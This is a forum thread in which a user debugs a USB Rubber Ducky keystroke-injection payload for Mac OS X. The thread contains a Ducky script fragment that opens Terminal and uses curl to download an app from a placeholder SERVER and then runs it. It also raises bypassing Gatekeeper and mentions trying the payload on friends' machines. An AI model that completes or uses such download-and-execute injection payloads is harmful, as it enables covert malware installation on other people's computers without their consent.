Jump to content

Because Mac OS X are having it too easy

Recommended Posts

I've recently been installing quite a couple virtual machines to try out my little duckies (nothing to say about the windows scripts, they work wonders and we have plenty of feedback on that part).

Yet, I need infection penetration testing on Mac OS X, and I can't seem to find much going on around the forums about that subject.

All I need, basically, is an understanding of their functionalities, and when I need a sudo password (like to disable Gatekeeper) or if simply being in terminal will bypass that for a simple app installation.

I'm only looking to download and execute an application downloaded from an external website, but what bugs me the most is that I can't get past the first steps. I have been using Jesse Wallace (c0deous) and Patrick Mosca's help by taking parts of their codes to make it work, and have been changing remotely the language used both by the duckencoder 2.6.3 (or whatever version it is) for canada french, english (us-french), canada english, have been also transforming the keyboard mapping inside the virtual machine itself to make sure it fitted well with the injection, but nothing worked.

Everytime I started the code

DELAY 1000

The space command seems to be working good at least haha, does open the top-right corner prompt

STRING Terminal

Here starts the problem. Terminal comes out as something like IAELtmin, tried making a sense out of it but I really couldn't. Every language gave a different but similar output, and none was able to fix the problem.


Problem number 2 : Despite the weird wording, it doesnt even press enter at this point, because I see some recommendations from Apple being highlighted, so naturally after the first fail it should keep on going for the next, yet it doesnt, which is weird.

STRING curl http://SERVER/path/to/file.app > file.app
DELAY 2000 (give it some time to download it)
STRING open -a file

And it keeps on writing without ever pressing the ENTER key, and mixing all the letters together.

Now I've been working with iAtkos if anyone is familiar with it, all setup good, and have worked hours and tried many different variables to make this work but the foundations itself don't wok (even the online encoder couldn't give me a good inject.bin output on the field)

So I was wondering if anyone has had these problems before, and if there is a way to fix it? Is it because it runs inside a VM and not a real Mac, and otherwise it would work? Is it simply because of an encoding/payload problem?

Also, on a sidenote, living in a french-canadian area where I have no clue which language my friends have, I was wondering if the canadian keyboard was unilateral, same for everyone, and if, whether they are writing in english or french the payload should work anyways (all with canadian keyboards, all QWERTY, simply ctrl+shift changes the key mapping from french to english).

Anyways, I'll be glad to hear from you guys soon, you seem like a great community, and this product is amazing as far as I tested it on Windows.

Thanks in advance!


Link to comment
Share on other sites

Oh, and second question, anyone knows why the commands/GUI aren't the same in these payloads meant for the same OS?



I tried both but the COMMAND function seemed like the one actually working on my VMs for some reason, and if manually typing Terminal in, it would be able to access it and write the rest of the payload (in total jabberish of course). What bugs me above all is the fact that the hardest part is actually acheived, yet only the smallest technical difficulty holds me back to the point where I can absolutely not do anything at all.

Best regards,


Link to comment
Share on other sites

Update : Tried it on a Mac OS X (not a mounted version) and the commands seemed to be working perfectly, all my bad! Only problem is that it was in canadian friench, therefore the layout must be different, as in the / key is replaced by the é key, how to fix that? making another keyboard layout only for canadian friench keyboards?

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...